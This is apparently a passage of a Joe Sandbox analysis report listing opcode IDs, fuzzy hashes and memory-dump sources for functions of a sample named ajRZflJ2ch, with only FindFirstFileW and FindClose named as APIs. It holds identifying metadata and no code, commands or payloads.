                                                                                                            • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                            • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                                            • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                            • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(00437800,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,75572EE0,00405B1A,?,00437800,75572EE0), ref: 00406736
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                            • String ID: xgB
                                                                                                            • API String ID: 2295610775-399326502
                                                                                                            • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                            • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                                                                            • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                            • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: B8
                                                                                                            • API String ID: 0-1426021447
                                                                                                            • Opcode ID: 1ea5fc3b0e273269748a40031f01b6fd65920b8bc318eab9df73e95a0f130773
                                                                                                            • Instruction ID: 1e2de66c8186b3db798087d9f994f1c0fa16b5129eabd148323dab105e6dd46d
                                                                                                            • Opcode Fuzzy Hash: 1ea5fc3b0e273269748a40031f01b6fd65920b8bc318eab9df73e95a0f130773
                                                                                                            • Instruction Fuzzy Hash: 2B627A74E01268CFEB64DF69C884BDDBBB2BB89301F5081EAD409A7255DB359E81CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2734067728.0000000036AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_36af0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 47d2370323401cebdd2c5034cbbb860ea9a471af152bb18f04b1828b6465a45f
                                                                                                            • Instruction ID: ec466e724f9399ba35c4e1ac115f8658ba7da22b8ff62b11695c672ff53baf42
                                                                                                            • Opcode Fuzzy Hash: 47d2370323401cebdd2c5034cbbb860ea9a471af152bb18f04b1828b6465a45f
                                                                                                            • Instruction Fuzzy Hash: A8C1C174E00218CFEB14DFA9C994B9DBBB2BF89301F1080A9D809AB355DB359A85DF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2734067728.0000000036AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_36af0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7ac4fb750751cb2eb303d73495d0af20f6cef0c6b0f1f287140545eba37ba091
                                                                                                            • Instruction ID: d717adf45726ea959c0846dae1f66bd4d5dbc0ea3d5b680e0cccc3f2c89a4c1f
                                                                                                            • Opcode Fuzzy Hash: 7ac4fb750751cb2eb303d73495d0af20f6cef0c6b0f1f287140545eba37ba091
                                                                                                            • Instruction Fuzzy Hash: F6C1C274E00258CFEB14DFA9C994B9DBBF2BF89300F1080A9D809AB355DB359A85DF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2734067728.0000000036AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_36af0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 699322d33018f6bc5dfb85d049dd2ec51a7961180ac46f9428886d658bfa3194
                                                                                                            • Instruction ID: 8246b764f507e2d99586306c5027d49d0c1a21c0146cc4896e10e1518ce76d08
                                                                                                            • Opcode Fuzzy Hash: 699322d33018f6bc5dfb85d049dd2ec51a7961180ac46f9428886d658bfa3194
                                                                                                            • Instruction Fuzzy Hash: 16C1D374E00218CFEB14DFA9C994B9DBBB2BF89300F1080A9D809AB355DB359E81DF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2734067728.0000000036AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_36af0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 91155cb8bf5209fdf263c5bb543a9eee66c09e1be9d27ec5145307512b934b00
                                                                                                            • Instruction ID: 2d8326d3771cfd71375e4766efec96c133a2db82780f673cf5c2d969656546eb
                                                                                                            • Opcode Fuzzy Hash: 91155cb8bf5209fdf263c5bb543a9eee66c09e1be9d27ec5145307512b934b00
                                                                                                            • Instruction Fuzzy Hash: E1C1C274E00218CFEB14DFA9C994B9DBBB2BF89300F5080A9D809AB355DB359E81DF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2734067728.0000000036AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_36af0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c934a654e31f4634d700ba5765aedd2115e8bc61cdaf0e2ef8878d481ef2ea20
                                                                                                            • Instruction ID: 8e218fe29a60f971aa2c2a730268be36c94332bfa37def56f943b1ce2309d82c
                                                                                                            • Opcode Fuzzy Hash: c934a654e31f4634d700ba5765aedd2115e8bc61cdaf0e2ef8878d481ef2ea20
                                                                                                            • Instruction Fuzzy Hash: CCC1D274E00258CFEB14DFA9C994B9DBBB2BF89300F5081A9D809AB355DB359E81DF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 64fda0450d2030a8d351d27666aa2445e49c35a25e67c09c268bc176c6bf9de0
                                                                                                            • Instruction ID: b6ea9994c2f0520875489e04a3fb8bbe17038747c23643cd18b48ef6e00be010
                                                                                                            • Opcode Fuzzy Hash: 64fda0450d2030a8d351d27666aa2445e49c35a25e67c09c268bc176c6bf9de0
                                                                                                            • Instruction Fuzzy Hash: 4FC1D274E00258CFEB14DFA9C994B9DBBB2BF89300F1081A9D809AB355DB359E81DF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 85ac141a768a142d588b41773353257acef34ca8a6021ad3778bfbe6561a8027
                                                                                                            • Instruction ID: 497f0c36cfa60b1d4df69f7ac3832bd837727448574835b0f0c7efe6dd6cf5ec
                                                                                                            • Opcode Fuzzy Hash: 85ac141a768a142d588b41773353257acef34ca8a6021ad3778bfbe6561a8027
                                                                                                            • Instruction Fuzzy Hash: FEC1C274E00258CFEB14DFA9C994B9DBBB2BF89300F1081A9D809AB355DB359E81DF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f63cfad4796bb4e2d3ae98c3b1adb43ba33ace29efb450900ff0df3f6698efd7
                                                                                                            • Instruction ID: ac3e1d7e9ccfeec7c45c6381277c7f5e5382a52e9720c8fd45fc6be6dd05741a
                                                                                                            • Opcode Fuzzy Hash: f63cfad4796bb4e2d3ae98c3b1adb43ba33ace29efb450900ff0df3f6698efd7
                                                                                                            • Instruction Fuzzy Hash: 1CC1D174E00258CFEB14DFA9C994B9DBBB2BF89300F1081A9D809AB355DB359E81DF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6bbf1439eaa7b5a7ac182a1d6b7ed353555f4f664cdb6c2fb3dc3c9cad72fc05
                                                                                                            • Instruction ID: 0786d23db6648627bc959ee540000cdebb37568811e171be359db44cd33614a0
                                                                                                            • Opcode Fuzzy Hash: 6bbf1439eaa7b5a7ac182a1d6b7ed353555f4f664cdb6c2fb3dc3c9cad72fc05
                                                                                                            • Instruction Fuzzy Hash: C7C1D174E00218CFEB14DFA9C994B9DBBB2BF89301F1081A9D809AB355DB359E81DF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 81055f25eae6f6791ebc687da1baff794b68f3676bc7c04e2661433439c073bf
                                                                                                            • Instruction ID: 1e54970d24d5df8af8557e9bc39b61f9502b41c0160d68441c23c738f3c749ca
                                                                                                            • Opcode Fuzzy Hash: 81055f25eae6f6791ebc687da1baff794b68f3676bc7c04e2661433439c073bf
                                                                                                            • Instruction Fuzzy Hash: AFC1D174E00258CFEB14DFA9C994B9DBBB2BF89300F5081A9D809AB355DB359E81DF10
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ffda6fb818ba36f29e5f8344c44bca902ed5ee0c8ab73dd74da5914bb30860ef
                                                                                                            • Instruction ID: 9b318c00f7aa9a4f8626b8440f772959577c1cf1b3f28ffb931a62a2821958d5
                                                                                                            • Opcode Fuzzy Hash: ffda6fb818ba36f29e5f8344c44bca902ed5ee0c8ab73dd74da5914bb30860ef
                                                                                                            • Instruction Fuzzy Hash: F0C1C074E00258CFEB14DFA9C994B9DBBB2BF89300F1081A9D809AB355DB359E81DF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c4dbe76f573b15b69df712e76e6a8a81262c7a04fff5eca98d86529fa97f3c92
                                                                                                            • Instruction ID: cd5615dfc75839377d96b502060677491d72c1f2cc3ab34cc53b26956ba8855d
                                                                                                            • Opcode Fuzzy Hash: c4dbe76f573b15b69df712e76e6a8a81262c7a04fff5eca98d86529fa97f3c92
                                                                                                            • Instruction Fuzzy Hash: 16C1E074E00258CFEB14DFA9C994B9DBBB2BF89300F1081A9D809AB355DB359E81DF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 474f7ad525fd1ce4959bfa41db1812fdcbd5aff6c9fd463dd06c7910e8cd0c18
                                                                                                            • Instruction ID: e0c992b8a9956549719e200d88e48e0c08b0c7cdffcd0dc85d55068091673b92
                                                                                                            • Opcode Fuzzy Hash: 474f7ad525fd1ce4959bfa41db1812fdcbd5aff6c9fd463dd06c7910e8cd0c18
                                                                                                            • Instruction Fuzzy Hash: 15C1C174E00258CFEB14DFA9C994B9DBBB2BF89300F1081A9D809AB355DB359E81DF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 86045d15372ca50652983c97b617383e958123005188d83d2c4c159fc4c02090
                                                                                                            • Instruction ID: a3c24aa0c7eccd7cbd36b426830bfc3994cf1bdd62f1274d50fc597ea893211a
                                                                                                            • Opcode Fuzzy Hash: 86045d15372ca50652983c97b617383e958123005188d83d2c4c159fc4c02090
                                                                                                            • Instruction Fuzzy Hash: 23C1D174E00258CFDB14DFA9C994B9DBBB2BF89300F6081A9D809AB355DB359E81DF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7fa5fdfef3f0aa02b7605eb04fa5eff4c536dfb0073d67004bb7c2bc5105e1b9
                                                                                                            • Instruction ID: f800e3a5efa2af474d2b4f127a5aee3da2e64e38b803035ad13c707e7a753a20
                                                                                                            • Opcode Fuzzy Hash: 7fa5fdfef3f0aa02b7605eb04fa5eff4c536dfb0073d67004bb7c2bc5105e1b9
                                                                                                            • Instruction Fuzzy Hash: 9FC1E174E00258CFEB14DFA9C994B9DBBB2BF89300F1081A9D809AB355DB359E81DF10
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e1ea76cad7ee37218d395ac5cafcd849678d908d65566bae6ba1fd352745ab12
                                                                                                            • Instruction ID: b7bf1386f790aa64950937f700bc1a789119119981d4558d3985a1a3a8142177
                                                                                                            • Opcode Fuzzy Hash: e1ea76cad7ee37218d395ac5cafcd849678d908d65566bae6ba1fd352745ab12
                                                                                                            • Instruction Fuzzy Hash: 98C1D274E00258CFEB14DFA9C994B9DBBB2BF89300F1081A9D809AB355DB359E85DF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 55b5b003a703b71a846198e4fda4ce107a8474eb29c98a3c0b40efcf2278f986
                                                                                                            • Instruction ID: bf9c8ca50d2d3bffe7967957d69d41582e94d79f8de1b708a399c86cdcb47c86
                                                                                                            • Opcode Fuzzy Hash: 55b5b003a703b71a846198e4fda4ce107a8474eb29c98a3c0b40efcf2278f986
                                                                                                            • Instruction Fuzzy Hash: 0DC1D274E00258CFEB14DFA9C994B9DBBB2BF89300F1081A9D809AB355DB359E85DF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6a115b4459bb8f14d11932a4cac594334010aea4a3aaa62f4a07ce40c593fb42
                                                                                                            • Instruction ID: 4cc8f99936113bb8ed052628a8df79a31c8b54a8ac24dec77fee72fb81c255f0
                                                                                                            • Opcode Fuzzy Hash: 6a115b4459bb8f14d11932a4cac594334010aea4a3aaa62f4a07ce40c593fb42
                                                                                                            • Instruction Fuzzy Hash: 49C1D174E00258CFEB14DFA9C994B9DBBB2BF89300F1081A9D809AB355DB359E81DF10
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d13c2ff4d29d42a8b9c09798011de1ba868708f87c832e4a21db0e3cb9003cf6
                                                                                                            • Instruction ID: 699d08093e2fb0ae67947f3689d383a8eb5b5b35866298461f7ad79f2759a585
                                                                                                            • Opcode Fuzzy Hash: d13c2ff4d29d42a8b9c09798011de1ba868708f87c832e4a21db0e3cb9003cf6
                                                                                                            • Instruction Fuzzy Hash: C7C1E174E00258CFEB14DFA9C994B9DBBB2BF89300F1081A9D809AB355DB359E81DF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 66ff36512d3e2c8aa71ec8b9fab18960b2931111242df20b48cd7eb56fccd6dc
                                                                                                            • Instruction ID: 2ea410b687dde5a2654256897433079eb0099125a2297b87eddb818f84f86803
                                                                                                            • Opcode Fuzzy Hash: 66ff36512d3e2c8aa71ec8b9fab18960b2931111242df20b48cd7eb56fccd6dc
                                                                                                            • Instruction Fuzzy Hash: 7BC1D174E00258CFEB14DFA9C994B9DBBB2BF89301F1081A9D809AB355DB359E81DF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 11360b449e1eaccb23eb2b842d42b6220155c848fd1562a9c3c256a098d9247b
                                                                                                            • Instruction ID: 0e84370f7f95e8c31599c097d3f71c40d37bcd87352b2639e9ea5c378e458b44
                                                                                                            • Opcode Fuzzy Hash: 11360b449e1eaccb23eb2b842d42b6220155c848fd1562a9c3c256a098d9247b
                                                                                                            • Instruction Fuzzy Hash: D4C1C174E00258CFDB14DFA9C994B9DBBB2BF89300F2081A9D809AB355DB359E81DF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0d48384c2bf12b211c32838751e638e1d42a2e1da7927427f63a80b428e99165
                                                                                                            • Instruction ID: 1eee6d07067064363fc84f7e47ea964dd6d59e15ad9a826dbf16fa5fc5d9a57b
                                                                                                            • Opcode Fuzzy Hash: 0d48384c2bf12b211c32838751e638e1d42a2e1da7927427f63a80b428e99165
                                                                                                            • Instruction Fuzzy Hash: E5C1C074E00258CFEB14DFA9C994B9DBBB2BF89300F1081A9D809AB355DB359E85DF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9b84154ab9a2d7c27df58a0cf64daa0d70eb72a33b7bb1475bf5bf2713a5c94a
                                                                                                            • Instruction ID: 0820c478b928506d3fc013630b60cb804f70c581799b702f4e14d15b74310604
                                                                                                            • Opcode Fuzzy Hash: 9b84154ab9a2d7c27df58a0cf64daa0d70eb72a33b7bb1475bf5bf2713a5c94a
                                                                                                            • Instruction Fuzzy Hash: 2FC1E074E00258CFEB14DFA9C994B9DBBB2BF89300F1081A9D809AB355DB359E81DF10
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b2774967fcefeb3e71a1bd695f805e1777a27cceb8ea1450b2b5efd2a488da7a
                                                                                                            • Instruction ID: 0e246424f7833f50d3535d15686a111a5591c085e99887023a8142c8b4e6b5b0
                                                                                                            • Opcode Fuzzy Hash: b2774967fcefeb3e71a1bd695f805e1777a27cceb8ea1450b2b5efd2a488da7a
                                                                                                            • Instruction Fuzzy Hash: 29C1D074E00258CFEB14DFA9C994B9DBBB2BF89300F1081A9D809AB355DB359E85DF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 54b1f99b3aeadd9b6d2a72b5925ed3e38f510611266ea2e0f019c608f20cb2bf
                                                                                                            • Instruction ID: ed69eedce2fce516ac218624d7a6df97e12363c0777ee6145f03105c5e127b6f
                                                                                                            • Opcode Fuzzy Hash: 54b1f99b3aeadd9b6d2a72b5925ed3e38f510611266ea2e0f019c608f20cb2bf
                                                                                                            • Instruction Fuzzy Hash: DEC1D074E00258CFEB14DFA9C994B9DBBB2BF89300F1081A9D809AB355DB359E85DF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d7742dd505e55e5ca9acab4ba5388b3aa04880c69bc6d044461a17c45c0fe1c3
                                                                                                            • Instruction ID: 349316fb2a9b11103de2355164bef54d7ccfb93dba5c0e07cd42751be85a5b8d
                                                                                                            • Opcode Fuzzy Hash: d7742dd505e55e5ca9acab4ba5388b3aa04880c69bc6d044461a17c45c0fe1c3
                                                                                                            • Instruction Fuzzy Hash: 90C1D174E00258CFEB14DFA9C994B9DBBB2BF89300F1081A9D809AB355DB359E81DF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 26bf9f442b4480a9e7f23fe0b753909f8d78165f26db81ec71b9e3345d05b44e
                                                                                                            • Instruction ID: f06590b6932973e6668cc7cabf02ca04038896fb7da1338b8893e8f7b4b138be
                                                                                                            • Opcode Fuzzy Hash: 26bf9f442b4480a9e7f23fe0b753909f8d78165f26db81ec71b9e3345d05b44e
                                                                                                            • Instruction Fuzzy Hash: 3FC1D174E00218CFDB14DFA9C994B9DBBB2BF89300F1081A9D809AB355DB359E85DF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9db7969af11568b3a0daec79cb5e3bc43deb9abcadb466535c7186e067363420
                                                                                                            • Instruction ID: e114e84f367096138954e1bf802fdbb047b660732d796cd2fb5c0a3f38ab7526
                                                                                                            • Opcode Fuzzy Hash: 9db7969af11568b3a0daec79cb5e3bc43deb9abcadb466535c7186e067363420
                                                                                                            • Instruction Fuzzy Hash: F2C1E074E00258CFEB14DFA9C994B9DBBB2BF89300F1081A9D809AB355DB359E85DF10
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fd1700090fd4a0e1bdb1b0dea869fbe059662eec367a6d429b7acf920fa3ca2e
                                                                                                            • Instruction ID: 9ead19e6b99fc4556997ad82f58f90af9100cf531072bfddda33e82518a1ebee
